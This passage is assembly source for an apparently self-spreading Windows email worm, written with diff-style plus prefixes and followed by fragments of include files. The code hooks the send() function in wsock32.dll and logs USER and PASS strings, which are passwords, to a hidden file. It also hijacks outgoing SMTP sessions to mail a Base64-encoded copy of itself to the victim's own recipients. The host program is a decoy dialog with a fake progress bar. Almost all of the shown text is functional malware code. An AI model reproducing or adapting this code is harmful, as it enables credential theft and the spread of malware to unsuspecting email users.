esi + + BeginSendAddressSearch: + mov esi, [ebp + addressofnames] ; search for + mov [ebp + AONindex], esi ; API in names + mov edi, [esi] ; table + + mov edx, edi + call RVA_TO_RAW + mov edi, ecx + xor ecx, ecx + + HookSendApi: + lea ebx, [ebp + ASend] + + OkTryAgain: + mov esi, ebx + + MatchByteNow: + cmpsb + jne NextOneNow + cmp byte ptr [esi], 0 ; did the entire string + je YesGotIt ; match ? + jmp MatchByteNow + + NextOneNow: + inc cx + add dword ptr [ebp + AONindex], 4 ; get next namepointer + mov esi, [ebp + AONindex] ; in table (4 dwords) + mov edi, [esi] + + push ebx + push ecx + + mov ebx, [ebp + mapaddress] + mov edx, edi + call RVA_TO_RAW + mov edi, ecx + + pop ecx + pop ebx + jmp OkTryAgain + + YesGotIt: + shl ecx, 1 + mov esi, [ebp + addressofordinals] ; ordinal = nameindex * + add esi, ecx ; size of ordinal entry + xor eax, eax ; + ordinal table base + mov ax, word ptr [esi] ; offset of address + shl eax, 2 ; of function = ordinal + mov esi, [ebp + addressoffunctions] ; * size of entry of + add esi, eax ; address table + mov edi, dword ptr [esi] ; get address + + SaveNewWsockApiAddress: + mov [ebp + woldapiaddress], edi ; save it + + ChangeWsock: + mov eax, dword ptr [ebp + wnewapiaddress] ; new api address + mov dword ptr [esi], eax ; set it + ret + +HOOK_API endp + +;===========================[ ic-rva_to_raw.inc ]===========================; + +RVA_TO_RAW proc + + ; In: edx - RVA to convert + ; Out: ecx - Pointer to RAW data or NULL if error + + GetRaw: + mov ebx, [ebp + mapaddress] + mov [ebp + rva2raw], edx + + mov esi, dword ptr [ebx + 3ch] + add esi, ebx ; esi=offset peheader + xor ecx, ecx + mov cx, word ptr [esi + 06h] ; ecx = nr. of sections + xor edi, edi + mov di, word ptr [esi + 20d] ; optional header size + add esi, 24d ; file header size + add edi, esi + + FindCorrespondingSection: + mov eax, dword ptr [ebp + rva2raw] ; rva we want into raw + mov edx, dword ptr [edi + 12d] ; section RVA + sub eax, edx + cmp eax, dword ptr [edi+08d] ; section size + jb SectionFound + + NotThisSection: + add edi, 40d + loop FindCorrespondingSection + + EndRawSearch: + ret + + SectionFound: + mov ecx, dword ptr [edi+20d] ; pntr to section's raw + sub edx, ecx ; data from beginning + add ecx, eax ; of file + add ecx, ebx + ret + +RVA_TO_RAW endp + +;=========================[ ic-create_ini_file.inc ]========================; + +CREATE_INI_FILE proc + + IniGetSetWindowsDir: + call SET_WINDIR + + CreateInstallIni: + push 0 ; template handle=0 + push 20h ; attributes=any file + push 4 ; type= new file + push 0 ; security option = 0 + push 1 ; shared for read + push 80000000h or 40000000h ; generic read write + lea eax, [ebp + inifile] + push eax ; offset file name + lea eax, [ebp + ACreateFile] + call GETAPI + mov [ebp + filehandle], eax + + SetIniFilePointerToEnd: + push 02h + push 00h + push 00h + push [ebp + filehandle] + lea eax, [ebp + ASetFilePointer] + call GETAPI + mov dword ptr [ebp + writtensize], 00h + + WriteInstallIniLoop: + lea esi, [ebp + inicrlf] + xor ecx, ecx + call StringSize + call Write + + lea esi, [ebp + rename] ; write 'rename' + mov word ptr [ebp + writtensize], 0Ah + call Write + + lea esi, [ebp + sysdir] ; write systemdir + xor ecx, ecx + call StringSize + call Write + + lea esi, [ebp + slashsign] ; write slash + xor ecx, ecx + call StringSize + call Write + + WriteWsock32Dll: + lea esi, [ebp + wsock32dll] ; write original dll + xor ecx, ecx + call StringSize + call Write + + WriteOn: + lea esi, [ebp + equalsign] ; write original dll + xor ecx, ecx + call StringSize + call Write + + lea esi, [ebp + sysdir] ; write systemdir + xor ecx, ecx + call StringSize + call Write + + lea esi, [ebp + slashsign] ; write slash + xor ecx, ecx + call StringSize + call Write + + WriteInfectedWsock: + lea esi, [ebp + wsock32inf] ; write original dll + xor ecx, ecx + call StringSize + call Write + jmp CloseInstallIni + + StringSize: + cmp byte ptr [esi + ecx], 0h + je GotSize + inc ecx + jmp StringSize + + GotSize: + mov word ptr [ebp + writtensize], cx + ret + + Write: + push 0h + lea eax, [ebp + writtenbytes] + push eax + xor eax, eax + mov ax, word ptr [ebp + writtensize] + push eax + push esi + push dword ptr [ebp + filehandle] + lea eax, [ebp + AWriteFile] + call GETAPI + ret + + CloseInstallIni: + lea esi, [ebp + inicrlf] ; write original dll + xor ecx, ecx + call StringSize + call Write + + push dword ptr [ebp + filehandle] + lea eax, [ebp + ACloseHandle] + call GETAPI + ret + +CREATE_INI_FILE endp + +;=========================[ ic-copy_host_file.inc ]=========================; + +COPY_HOST_FILE proc + + GetCurrentHostPath: + push 100h + lea eax, [ebp + currentdir] + push eax + push 00h + lea eax, [ebp + AGetModuleFileName] + call GETAPI + + SetSysDirectory: + call SET_SYSDIR + + CopyWormHostFile: + push 00h + lea eax, [ebp + wsock2] + push eax + lea eax, [ebp + currentdir] + push eax + lea eax, [ebp + ACopyFile] + call GETAPI + ret + +COPY_HOST_FILE endp + +;=========================[ ic-ws_intercept.inc ]===========================; + +INTERCEPT_WSOCK proc + + InterceptWsockApiCall: + push ebp + call GetDelta + + GetDelta: + pop ebp + sub ebp, offset GetDelta + pushad + + CheckStatus: + mov eax, [esp+(8*4)+(1*4)+4 + 0] ; get send() socket + mov [ebp + socketh], eax ; save it + mov esi, [esp+(8*4)+(1*4)+4 + 4] ; send() buffer + mov ecx, [esp+(8*4)+(1*4)+4 + 8] ; size of buffer + + pushad + call GET_GETPROCADDRESS_API_ADDRESS + popad + + CheckForSecurityInfo: + cmp [esi], 'RESU' + je StoreBufferData + cmp [esi], 'SSAP' + jne DontStore + + StoreBufferData: + pushad + call WRITE_TO_FILE + popad + + DontStore: + cmp [ebp + status], 00h ; monitoring==true ? + je CheckMailFrom ; yes, we are + cmp [ebp + status], 02h + je CheckRcptTo + cmp [ebp + status], 03h + je CheckMimeFrom + cmp [ebp + status], 05h + je CheckQuit + jmp Continue + + CheckMailFrom: + mov esi, [esp+(8*4)+(1*4)+4 + 4] ; send() buffer + mov ecx, [esp+(8*4)+(1*4)+4 + 8] ; size of buffer + cmp [esi], 'LIAM' + jne Continue + + StoreMailFromTag: + pushad + call WRITE_TO_FILE + popad + + SaveMailFrom: + mov [ebp + fromsize], ecx + push ecx + push esi + + push ecx + push 00h + lea eax, [ebp + AGlobalAlloc] + call GETAPI + + or eax, eax + jz ErrorWhileSending + + pop esi + pop ecx + mov [ebp + fromaddress], eax + mov edi, eax + rep movsb + mov [ebp + status], 02h + + CheckRcptTo: + mov esi, [esp+(8*4)+(1*4)+4 + 4] ; send() buffer + mov ecx, [esp+(8*4)+(1*4)+4 + 8] ; size of buffer + cmp [esi], 'TPCR' + jne CheckData + + AllocateRcptMemory: + cmp [ebp + rcptnumber], 00h + jne SaveRcptTo + + push ecx + push esi + + push 500h + push 00h + lea eax, [ebp + AGlobalAlloc] + call GETAPI + or eax, eax + jz ErrorWhileSending ; mem for rctp email + mov [ebp + rcpt_buffer_address], eax ; addresses + + push 100h + push 00h + lea eax, [ebp + AGlobalAlloc] + call GETAPI + or eax, eax + jz ErrorWhileSending ; mem for size of rctp + mov [ebp + rcpt_size_address], eax ; email addresses + + pop esi + pop ecx + + SaveRcptTo: + push ecx ; store rcpt string + mov edi, [ebp + rcpt_buffer_address] + mov eax, [ebp + totalrcptsize] + add edi, eax + rep movsb + pop ecx + + mov edi, [ebp + rcpt_size_address] ; store rcpt string size + mov eax, [ebp + rcptnumber] + mov edx, 04h + mul edx + add edi, eax + mov dword ptr [edi], ecx + + mov eax, [ebp + totalrcptsize] ; calculate total size + add eax, ecx ; of rcpts + mov [ebp + totalrcptsize], eax + + mov eax, [ebp + rcptnumber] ; calculate number of + add eax, 01h ; rcpt we have + mov [ebp + rcptnumber], eax + jmp Continue + + CheckData: + mov esi, [esp+(8*4)+(1*4)+4 + 4] ; send() buffer + mov ecx, [esp+(8*4)+(1*4)+4 + 8] ; size of buffer + cmp [esi], 'ATAD' + jne Continue + mov [ebp + status], 03h + + CheckMimeFrom: + mov esi, [esp+(8*4)+(1*4)+4 + 4] ; send() buffer + mov ecx, [esp+(8*4)+(1*4)+4 + 8] ; size of buffer + + MimeFromLoop: + lea edi, [ebp + fromtag] + push ecx + push esi + mov ecx, 05h + rep cmpsb + pop esi + pop ecx + je SearchMimeFromEnd + inc esi + loop MimeFromLoop + + CheckMimeTo: + mov esi, [esp+(8*4)+(1*4)+4 + 4] + mov ecx, [esp+(8*4)+(1*4)+4 + 8] + + MimeToLoop: + lea edi, [ebp + totag] + push ecx + push esi + mov ecx, 03h + rep cmpsb + pop esi + pop ecx + je SearchMimeToEnd + inc esi + loop MimeToLoop + jmp CheckQuit + + SearchMimeFromEnd: + push esi + + FromEndLoop: + lea edi, [ebp + mimeendtag] + push ecx + push esi + mov ecx, 01h + rep cmpsb + pop esi + pop ecx + je SaveMimeFrom + inc esi + loop FromEndLoop + + pop esi + jmp Continue + + SaveMimeFrom: + mov eax, esi + pop esi + sub eax, esi + mov ecx, eax + add ecx, 03h + mov [ebp + mimefromsize], ecx + push esi + push ecx + + push ecx + push 00h + lea eax, [ebp + AGlobalAlloc] + call GETAPI + or eax, eax + jz MimeError + mov [ebp + mimefrom_address], eax + + pop ecx + pop esi + mov edi, eax + rep movsb + + mov [ebp + fromstatus], 01h + cmp [ebp + tostatus], 01h + jne CheckMimeTo + mov [ebp + status], 05h + jmp CheckQuit + + SearchMimeToEnd: + push esi + + ToEndLoop: + lea edi, [ebp + toendtag] + push ecx + push esi + mov ecx, 08h + rep cmpsb + pop esi + pop ecx + je SaveMimeTo + inc esi + loop ToEndLoop + + pop esi + jmp Continue + + SaveMimeTo: + mov eax, esi + pop esi + sub eax, esi + mov ecx, eax + mov [ebp + mimetosize], ecx + push esi + push ecx + + push ecx + push 00h + lea eax, [ebp + AGlobalAlloc] + call GETAPI + or eax, eax + jz MimeError + mov [ebp + mimeto_address], eax + + pop ecx + pop esi + mov edi, eax + rep movsb + + mov [ebp + tostatus], 01h + cmp [ebp + fromstatus], 01h + jne CheckMimeFrom + mov [ebp + status], 05h + jmp CheckQuit + + MimeError: + pop ecx + pop esi + mov [ebp + status], 05h + + CheckQuit: + mov esi, [esp+(8*4)+(1*4)+4 + 4] + mov ecx, [esp+(8*4)+(1*4)+4 + 8] + cmp [esi], 'TIUQ' + jne Continue + + pushad + call SEND_MAIL + popad + + jmp InterceptionFinished + + ErrorWhileSending: + pop esi + pop ecx + + InterceptionFinished: + mov [ebp + status], 00h + mov [ebp + totalrcptsize], 00h + mov [ebp + rcptnumber], 00h + mov [ebp + tostatus], 00h + mov [ebp + fromstatus], 00h + jmp Continue + + Continue: + popad + lea eax, [ebp + InterceptWsockApiCall] ; get ep va + sub eax, dword ptr [ebp + wnewapiaddress] ; - ep RVA + add eax, dword ptr [ebp + woldapiaddress] ; = imagebase + pop ebp + jmp eax + +INTERCEPT_WSOCK endp + +;========================[ ic-ws_attachment.inc ]===========================; + +PREPARE_ATTACHMENT proc + + SetSysDir: + call SET_SYSDIR + + OpenSourceFile: + push 0 + push 0 + push 3 + push 0 + push 0 + push 80000000h + lea eax, [ebp + wsock2] + push eax + lea eax, [ebp + ACreateFile] + call GETAPI + mov [ebp + filehandle], eax ; save file handle + cmp eax, -1 + je NoBase64Encode + + GetSourceFileSize: + push 00h + push dword ptr [ebp + filehandle] + lea eax, [ebp + AGetFileSize] + call GETAPI + + or eax, eax + jz NoBase64Encode + mov [ebp + filesize], eax ; get file size + + AllocateSourceMemory: + add eax, 02h + push eax + push 00h + lea eax, [ebp + AGlobalAlloc] + call GETAPI + + or eax, eax + jz NoBase64Encode ; not enough memory? + mov [ebp + smHnd], eax ; sourcememory handle + + AllocateDestinationMemory: + mov eax, [ebp + filesize] + xor edx, edx + mov ecx, 02h + mul ecx + push eax + push 00h + lea eax, [ebp + AGlobalAlloc] + call GETAPI + + or eax, eax + jz NoBase64Encode ; not enough memory? + mov [ebp + dmHnd], eax ; destinationmemory handle + + ReadSourceFile: + mov [ebp + bytesread], 00h + + push 00h + lea eax, [ebp + bytesread] + push eax + push [ebp + filesize] + push dword ptr [ebp + smHnd] + push dword ptr [ebp + filehandle] + lea eax, [ebp + AReadFile] + call GETAPI + + mov eax, dword ptr [ebp + bytesread] + or eax, eax + jz NoBase64Encode ; nothing read ? + + CloseSourceFile: + push dword ptr [ebp + filehandle] ; close the file + lea eax, [ebp + ACloseHandle] + call GETAPI + + EncodeSourceData: + mov eax, dword ptr [ebp + smHnd] + mov edx, dword ptr [ebp + dmHnd] + mov ecx, dword ptr [ebp + filesize] + call BASE64_ENCODER ; encode into Base64 + mov [ebp + encodedsize], ecx + + NoBase64Encode: + ret + +PREPARE_ATTACHMENT endp + +;=========================[ ic-ws_b64encoder.inc ]==========================; + +BASE64_ENCODER proc + + ; in: eax address of data to encode + ; edx address to put encoded data + ; ecx size of data to encode + ; + ; out: ecx size of encoded data + ; + + CheckFileSize: + push eax + push edx + push ecx + mov eax, ecx + xor edx, edx + mov ecx, 03h + div ecx + pop ecx + or edx, edx + jz EncodeBase64 + + AddTwoBytes: + cmp edx, 01h + jne AddOneByte + add ecx, 02h + jmp EncodeBase64 + + AddOneByte: + add ecx, 01h + + EncodeBase64: + pop edx + pop eax + xor esi, esi + lea edi, [ebp + encTable] + push ebp + xor ebp, ebp + + BaseLoop: + xor ebx, ebx + mov bl, byte ptr [eax] + shr bl, 2 + and bl, 00111111b + mov bh, byte ptr [edi+ebx] + mov byte ptr [edx+esi], bh + inc esi + + mov bx, word ptr [eax] + xchg bl, bh + shr bx, 4 + xor bh, bh + and bl, 00111111b + mov bh, byte ptr [edi+ebx] + mov byte ptr [edx+esi], bh + inc esi + + inc eax + mov bx,word ptr [eax] + xchg bl, bh + shr bx, 6 + xor bh, bh + and bl, 00111111b + mov bh, byte ptr [edi+ebx] + mov byte ptr [edx+esi], bh + inc esi + + inc eax + xor ebx, ebx + mov bl, byte ptr [eax] + and bl, 00111111b + mov bh, byte ptr [edi+ebx] + mov byte ptr [edx+esi], bh + inc esi + inc eax + + inc ebp + cmp ebp, 24 + ja AddEndOfLine + inc ebp + + AddedEndOfLine: + sub ecx, 3 + or ecx, ecx + jnz BaseLoop + + mov word ptr [edx+esi], 0a0dh + add esi, 2 + mov ecx, esi + pop ebp + ret + + AddEndOfLine: + xor ebp, ebp + mov word ptr [edx+esi], 0a0dh + add esi, 2 + jmp AddedEndOfLine + +BASE64_ENCODER endp + +;=======================[ ic-ws_write_to_file.inc ]=========================; + +WRITE_TO_FILE proc + + StoreBuffer: + push esi + push ecx + + SetEmailDropDir: + call SET_WINDIR + + CreateEmailDrop: + push 0 ; template handle=0 + push 20h ; attributes=any file + push 04h ; type= existing file + push 0 ; security option = 0 + push 1 ; shared for read + push 80000000h or 40000000h ; generic read write + lea eax, [ebp + passwordfile] + push eax ; offset file name + lea eax, [ebp + ACreateFile] + call GETAPI + mov [ebp + filehandle], eax ; save file handle + cmp eax, -1 + je BufferError + + SetDropPointer: + push 2 + push 0 + push 0 + push dword ptr [ebp + filehandle] ; filehandle + lea eax, [ebp + ASetFilePointer] + call GETAPI + + pop ecx + pop esi + + WriteBuffer: + push 0h + lea eax, [ebp + writtenbytes] + push eax + push ecx ; push buffersize + push esi ; push offset buffer + push dword ptr [ebp + filehandle] + lea eax, [ebp + AWriteFile] + call GETAPI + + CloseBufferFile: + push dword ptr [ebp + filehandle] + lea eax, [ebp + ACloseHandle] + call GETAPI + ret + + BufferError: + pop ecx + pop esi + ret + +WRITE_TO_FILE endp + +;============================[ ic-send_mail.inc ]============================; + +SEND_MAIL proc + + GetAllApiAddresses: + call GET_WSOCK32_BASE_ADDRESS + call GET_USER32_BASE_ADDRESS + call PREPARE_ATTACHMENT + + mov eax, [ebp + filehandle] + cmp eax, -1 ; attachment error + je SendError + + AllocateEmailBufferMemory: + mov eax, [ebp + encodedsize] + mov ecx, 02h + mul ecx + push eax + push 00h + lea eax, [ebp + AGlobalAlloc] + call GETAPI + + or eax, eax + jz SendError ; mem for email + mov [ebp + email_buffer_address], eax ; buffer + + SendMailFromTag: + mov eax, dword ptr [ebp + fromaddress] + mov ecx, dword ptr [ebp + fromsize] + call SendCommand + call ReceiveReply + + SendRcptToTags: + xor ecx, ecx + mov [ebp + totalrcptsize], 00h + + RcptSendLoop: + push ecx + + mov edi, [ebp + rcpt_size_address] + mov eax, ecx + mov edx, 04h + mul edx + add edi, eax + mov ecx, dword ptr [edi] + + mov esi, [ebp + rcpt_buffer_address] + mov eax, [ebp + totalrcptsize] + add esi, eax + + pushad + mov eax, esi + call SendCommand + call ReceiveReply + popad + + add eax, ecx + mov [ebp + totalrcptsize], eax + + pop ecx + inc ecx + mov eax, [ebp + rcptnumber] + cmp ecx, eax + jne RcptSendLoop + + SendDataCommand: + lea eax, [ebp + datatag] + mov ecx, 06h + call SendCommand + call ReceiveReply + + EmailBody_EmailId: + mov [ebp + email_size], 00h + mov edi, [ebp + email_buffer_address] + lea esi, [ebp + emailid] + mov ecx, 21d + add [ebp + email_size], ecx + rep movsb + + EmailBody_EmailFrom: + cmp [ebp + fromstatus], 01h + jne EmailBody_MakeEmailFrom + + mov esi, [ebp + mimefrom_address] + mov ecx, [ebp + mimefromsize] + add [ebp + email_size], ecx + rep movsb + jmp EmailBody_EmailTo + + EmailBody_MakeEmailFrom: + lea esi, [ebp + fromtag] + mov ecx, 05h + add [ebp + email_size], ecx + rep movsb + + mov esi, dword ptr [ebp + fromaddress] + add esi, 11d + mov ecx, dword ptr [ebp + fromsize] + sub ecx, 11d + add [ebp + email_size], ecx + rep movsb + + EmailBody_EmailTo: + cmp [ebp + tostatus], 01h + jne EmailBody_MakeEmailTo + + mov esi, [ebp + mimeto_address] + mov ecx, [ebp + mimetosize] + add [ebp + email_size], ecx + rep movsb + jmp EmailBody_EmailStartPart + + EmailBody_MakeEmailTo: + lea esi, [ebp + totag] + mov ecx, 03h + add [ebp + email_size], ecx + rep movsb + + xor ecx, ecx + mov [ebp + totalrcptsize], 00h + + RcptStringLoop: + push ecx + + push edi + mov edi, [ebp + rcpt_size_address] + mov eax, ecx + mov edx, 04h + mul edx + add edi, eax + mov ecx, dword ptr [edi] + pop edi + + push ecx + mov esi, [ebp + rcpt_buffer_address] + mov eax, [ebp + totalrcptsize] + add esi, eax + add esi, 08h + sub ecx, 08h + add [ebp + email_size], ecx + rep movsb + + pop ecx + add eax, ecx + mov [ebp + totalrcptsize], eax + + pop ecx + inc ecx + mov eax, [ebp + rcptnumber] + cmp ecx, eax + jne RcptStringLoop + + EmailBody_EmailStartPart: + lea esi, [ebp + emailstart] + mov ecx, emailend-emailstart + add [ebp + email_size], ecx + rep movsb + + EmailBody_EmailAttachement: + mov esi, dword ptr [ebp + dmHnd] + mov ecx, [ebp + encodedsize] + add [ebp + email_size], ecx + rep movsb + + EmailBody_EmailEndPart: + lea esi, [ebp + emailtail] + mov ecx, 17d + add [ebp + email_size], ecx + rep movsb + + EmailBody_EndTag: + lea esi, [ebp + endtag] + mov ecx, 05h + add [ebp + email_size], ecx + rep movsb + + SendEmailBody: + mov eax, [ebp + email_buffer_address] + mov ecx, [ebp + email_size] + call SendCommand + call ReceiveReply + + MessageBoxDay: + lea eax, [ebp + timedate] + push eax + lea eax, [ebp + AGetSystemTime] + call GETAPI + + xor eax, eax + mov ax, word ptr [ebp + timedate.wMonth] + cmp ax, 07h + jne SendError + mov ax, word ptr [ebp + timedate.wDay] + cmp ax, 01h + jne SendError + + MessageBoxPayload: + mov eax, 0040h + push eax + lea eax, [ebp + windowtitle] + push eax + lea eax, [ebp + msgmessage] + push eax + push 00h + lea eax, [ebp + AMessageBox] + call GETUAPI + + SendError: + ret + +;-----------------------------[ send routine ]------------------------------; + + SendCommand: + push eax + + push 0h + push ecx + push eax + push dword ptr [ebp + socketh] + lea eax, [ebp + ASend] + call GETWAPI + + cmp eax, -1 + jne SendWentOk + + pop eax + jmp SendCommand + + SendWentOk: + pop eax + ret + +;--------------------------[ receive routine ]------------------------------; + + ReceiveReply: + push LARGE 0 + push LARGE 60 + lea eax, [ebp + recvbuffer] + push eax + push dword ptr [ebp + socketh] + lea eax, [ebp + ARecv] + call GETWAPI ; call the api + + cmp eax, -1 + je ReceiveReply + ret + +SEND_MAIL endp + +;****************************************************************************; + + Leap: + +.code + + OriginalHost: + push 0 + call GetModuleHandleA + mov hInst, eax + + CreateProgressWindow: + push 00h + push offset MYDIALOG_0 + push 00h + push 102 + push hInst + call DialogBoxParamA + + CreateMainWindow: + push 00h + push offset MYDIALOG_1 + push 00h + push 103 + push hInst + call DialogBoxParamA + + Leave: + push 0 + call ExitProcess + +;============================[ ic-host_code.inc ]============================; + +MYDIALOG_0 proc handle, umsg, wparam, lparam: dword + + CheckParameter: + cmp [umsg], WM_INITDIALOG + je CenterDlg + cmp [umsg], WM_DESTROY + je Exit + cmp [umsg], WM_CLOSE + je Exit + cmp flag, 01h + je CreateProgressThread + cmp flag, 02h + je Exit + xor eax, eax + ret + + CenterDlg: + push offset dlgrect + push handle + call GetWindowRect + call GetDesktopWindow + push offset desktoprect + push eax + call GetWindowRect + + push 00h + mov eax, dlgrect.rcBottom + sub eax, dlgrect.rcTop + mov dlgheight, eax + push eax ; height + mov eax, dlgrect.rcRight + sub eax, dlgrect.rcLeft + mov dlgwidth, eax ; width + push eax + mov eax, desktoprect.rcBottom + sub eax, dlgheight + shr eax, 1 + push eax ; bottom + mov eax, desktoprect.rcRight + sub eax, dlgwidth + shr eax, 1 + push eax ; top + push handle ; handle + call MoveWindow ; move to center + mov flag, 01h + xor eax, eax + ret + + CreateProgressThread: + push offset threadid + push 00h + push handle + push offset PROGRESS + push 00h + push 00h + call CreateThread + mov flag, 00h + xor eax, eax + ret + + Exit: + push wparam + push handle + call EndDialog + mov eax, 01h + ret + +MYDIALOG_0 endp + +MYDIALOG_1 proc handle, umsg, wparam, lparam: dword + + CheckParameter1: + cmp [umsg], WM_INITDIALOG + je CenterDlg1 + cmp [umsg], WM_DESTROY + je Exit1 + cmp [umsg], WM_CLOSE + je Exit1 + cmp [umsg], WM_COMMAND + je CheckCommand + cmp [umsg], WM_VSCROLL + je SpinButtonClick + cmp initflag, 01h + je InitValues + xor eax, eax + ret + + CheckCommand: + cmp [wparam], 1009 + je Exit + cmp [wparam], 1014 + je SetOkFlag + xor eax, eax + ret + + SpinButtonClick: + xor eax, eax + mov ecx, [wparam] + rol ecx, 16 + mov ax, cx + + mov ecx, pastvalue + cmp ecx, eax + jge PressedUp + + PressedDown: + mov pastvalue, eax + cmp doneflag, 00h + jne Reset + cmp currentvalue, '0' + je DontDecrease + dec byte ptr currentvalue + + DontDecrease: + push offset currentvalue + push 00h + push WM_SETTEXT + push 1003 + push handle + call SendDlgItemMessageA + mov doneflag, 01h + xor eax, eax + ret + + PressedUp: + mov pastvalue, eax + cmp currentvalue, '9' + je Reset + cmp doneflag, 00h + jne Reset + inc byte ptr currentvalue + push offset currentvalue + push 00h + push WM_SETTEXT + push 1003 + push handle + call SendDlgItemMessageA + mov doneflag, 01h + xor eax, eax + ret + + Reset: + mov doneflag, 00h + xor eax, eax + ret + + SetOkFlag: + mov okflag, 01h + jmp Exit + + CenterDlg1: + push offset dlgrect + push handle + call GetWindowRect + call GetDesktopWindow + push offset desktoprect + push eax + call GetWindowRect + + push 00h + mov eax, dlgrect.rcBottom + sub eax, dlgrect.rcTop + mov dlgheight, eax + push eax ; height + mov eax, dlgrect.rcRight + sub eax, dlgrect.rcLeft + mov dlgwidth, eax ; width + push eax + mov eax, desktoprect.rcBottom + sub eax, dlgheight + shr eax, 1 + push eax ; bottom + mov eax, desktoprect.rcRight + sub eax, dlgwidth + shr eax, 1 + push eax ; top + push handle ; handle + call MoveWindow ; move to center + mov initflag, 01h + xor eax, eax + ret + + InitValues: + mov initflag, 00h + call SendDlgItemMessageA, handle, 1004, CB_RESETCONTENT, 00h,00h + call SendDlgItemMessageA, handle, 1004, 143h, 00h, offset value11 + call SendDlgItemMessageA, handle, 1004, 143h, 00h, offset value12 + call SendDlgItemMessageA, handle, 1004, 143h, 00h, offset value13 + call SendDlgItemMessageA, handle, 1004, 143h, 00h, offset value14 + call SendDlgItemMessageA, handle, 1004, CB_SETCURSEL, 00h, 01h + call SendDlgItemMessageA, handle, 1003, WM_SETTEXT, 00h, offset currentvalue + call SendDlgItemMessageA, handle, 1005, WM_SETTEXT, 00h, offset value3 + call SendDlgItemMessageA, handle, 1008, WM_SETTEXT, 00h, offset value4 + call SendDlgItemMessageA, handle, 1000, 00F5h, 00h,00h + call SendDlgItemMessageA, handle, 1001, 00F5h, 00h,00h + call SendDlgItemMessageA, handle, 1006, 00F5h, 00h,00h + call SendDlgItemMessageA, handle, 1010, 00F5h, 00h,00h + call SendDlgItemMessageA, handle, 1013, 00F5h, 00h,00h + xor eax, eax + ret + + Exit1: + push wparam + push handle + call EndDialog + mov eax, 01h + ret + +MYDIALOG_1 endp + +PROGRESS proc handle: dword + + ClearProgressBar: + push 00h + push 00h + push PBM_SETPOS + push 105 + push handle + call SendDlgItemMessageA + xor eax, eax + xor ecx, ecx + + LittleLoop: + inc ecx + cmp ecx, 100000h + jne LittleLoop + + ProgressLoop: + inc eax + push 00h + push eax + push PBM_SETPOS + push 105 + push handle + call SendDlgItemMessageA + xor ecx, ecx + cmp eax, 99d + jne LittleLoop + + ProgressDone: + mov flag, 02h + push threadid + call CloseHandle + ret + +PROGRESS endp + +;============================================================================; + +end Start +end +[ICECUBES.ASM] +[MYINC.INC] +LPVOID typedef DWORD ;long ptr to buffer +BOOL typedef DWORD ;boolean variable +HANDLE typedef DWORD ;unspecified handle +LPSTR typedef DWORD ;long ptr to string +LPBYTE typedef DWORD ;long ptr to byte +ACHAR typedef BYTE ;ansi character +CHAR textequ ;ansi char type +CHAR_ equ 1 ;ansi char size + +CREATE_DEFAULT_ERROR_MODE equ 04000000h + +SECURITY_ATTRIBUTES_ equ 4+4+4 +SECURITY_ATTRIBUTES struct +sa_nLength DWORD SECURITY_ATTRIBUTES_ ;structure size +sa_lpSecurityDescriptor LPVOID 0 ;security descriptor +sa_bInheritHandle BOOL 0 ;handle inheritance flag +SECURITY_ATTRIBUTES ends + +PROCESS_INFORMATION struct +pi_hProcess HANDLE 0 ;process handle +pi_hThread HANDLE 0 ;thread handle +pi_dwProcessId DWORD 0 ;process id +pi_dwThreadId DWORD 0 ;thread id +PROCESS_INFORMATION ends +PROCESS_INFORMATION_ equ 4+4+4+4 + +STARTUPINFO struct +si_cb DWORD 0 ;structure size +si_lpReserved LPSTR 0 ;(reserved) +si_lpDesktop LPSTR 0 ;desktop name +sl_lpTitle LPSTR 0 ;console window title +si_dwX DWORD 0 ;window origin (column) +si_dwY DWORD 0 ;window origin (row) +si_dwXSize DWORD 0 ;window width +si_dwYSize DWORD 0 ;window height +si_dwXCountChars DWORD 0 ;screen buffer width +si_dwYCountChars DWORD 0 ;screen buffer height +si_dwFillAttribute DWORD 0 ;console window initialization +si_dwFlags DWORD 0 ;structure member flags +si_wShowWindow WORD 0 ;ShowWindow() parameter +si_cbReserved2 WORD 0 ;(reserved) +si_lpReserved2 LPBYTE 0 ;(reserved) +si_hStdInput HANDLE 0 ;standard input handle +si_hStdOutput HANDLE 0 ;standard output handle +si_hStdError HANDLE 0 ;standard error handle +STARTUPINFO ends +STARTUPINFO_ equ 4+4+4+4+4+4+4+4+4+4+4+4+2+2+4+4+4+4 + +SYSTEMTIME struct +wYear WORD 0 ;current year +wMonth WORD 0 ;current month (1..12) +wDayOfWeek WORD 0 ;day of week (0 = sunday) +wDay WORD 0 ;current day of the month +wHour WORD 0 ;current hour +wMinute WORD 0 ;current minute +wSecond WORD 0 ;current second +wMilliseconds WORD 0 ;current millisecond +SYSTEMTIME ends +SYSTEMTIME_ equ 2+2+2+2+2+2+2+2 +; + +WIN32_FIND_DATA_ equ 4+8+8+8+4+4+4+4+(260*CHAR_)+(14*CHAR_) +WIN32_FIND_DATA struct +fd_dwFileAttributes DWORD 0 ;file attributes +fd_ftCreationTime DWORD 0, 0 ;time of file creation +fd_ftLastAccessTime DWORD 0, 0 ;time of last file access +fd_ftLastWriteTime DWORD 0, 0 ;time of last write access +fd_nFileSizeHigh DWORD 0 ;high-order word of file size +fd_nFileSizeLow DWORD 0 ;low-order word of file size +fd_dwReserved0 DWORD 0 ;(reserved) +fd_dwReserved1 DWORD 0 ;(reserved) +fd_cFileName CHAR 260 dup(0) ;matching file name +fd_cAlternateFileName CHAR 14 dup(0) ;8.3 alias name +WIN32_FIND_DATA ends +; +[MYINC.INC] +[WINDOWS.INC] +;************************************************************************* +; +; WINDOWS.INC - Windows assembly language structures & constants +; +;************************************************************************* +; +; +; C/C++ Run Time Library - Version 7.0 +; +; Copyright (c) 1985, 1996 by Borland International +; All Rights Reserved. +; +; +; Conditional Block includes: (True states) +; NOTEXT - don't include TextMetric struc & text drawing modes & stock objs. +; NORASTOPS - don't include binary and ternary raster ops. +; NOVK - don't include virtual key definitions +; NOMB - don't include message box definitions +; NOWM - don't include window messages +; +; +FALSE = 0 +TRUE = 1 +NULL = 0 + + +;******************************************************************* +; +; Misc EQU's +; +;******************************************************************* + +SB_SETTEXTA equ WM_USER+01 +SB_GETTEXTA equ WM_USER+02 +SB_GETTEXTLENGTHA equ WM_USER+03 +SB_SETPARTS equ WM_USER+04 +SB_GETPARTS equ WM_USER+06 +SB_GETBORDERS equ WM_USER+07 +SB_SETMINHEIGHT equ WM_USER+08 +SB_SIMPLE equ WM_USER+09 +SB_GETRECT equ WM_USER+10 +SB_SETTEXTW equ WM_USER+11 +SB_GETTEXTLENGTHW equ WM_USER+12 +SB_GETTEXTW equ WM_USER+13 + +GCL_MENUNAME equ -8 +GCL_HBRBACKGROUND equ -10 